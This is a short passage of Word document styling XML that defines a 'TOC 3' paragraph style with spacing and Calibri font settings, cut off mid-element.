    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC3">
    <w:name w:val="TOC 3"/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi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